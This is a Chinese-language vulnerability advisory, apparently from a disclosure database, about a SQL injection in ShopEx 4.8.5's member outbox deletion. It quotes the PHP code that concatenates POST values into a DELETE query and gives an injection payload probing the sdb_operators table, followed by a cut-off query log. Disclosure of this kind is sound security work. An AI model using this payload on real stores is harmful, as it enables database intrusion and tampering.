shopex注入漏洞#3

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 无聊的sql注入 测试版本:shopex-singel-4.8.5.78660 ### 详细说明: 在文件:\core\shop\controller\ctl.member.php ``` function delOutBoxMsg() { if(!empty($_POST['deloutbox'])){ $oMsg = &$this->system->loadModel('resources/msgbox'); $oMsg->delOutBoxMsg($_POST['deloutbox']); $this->splash('success', $this->system->mkUrl("member","outbox"), __('删除成功')); }else{ $this->splash('failed', $this->system->mkUrl("member","outbox"), __('删除失败: 没有选中任何记录!')); } } ``` 和shopex注入漏洞#2一样的问题 ``` public function delOutBoxMsg( $aMsgId ) { foreach ( $aMsgId as $val ) { if ( $val ) { $aTmp[] = $val; } } if ( $aTmp ) { $this->db->exec( "DELETE FROM sdb_message WHERE msg_id IN (".implode( ",", $aTmp ).")" ); } return true; } ``` 提交:deloutbox[1]=1) and (select count(*) from sdb_operators)=1%23 ``` 130526 20:49:28 372 Connectroot@localhost on 372 Init DBshopex 372 QuerySET NAMES 'utf8' 372 QuerySELECT * FROM sdb_plugins WHERE plugin_type="app" 372 Queryselect * from sdb_plugins where plugin_type="app" and...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息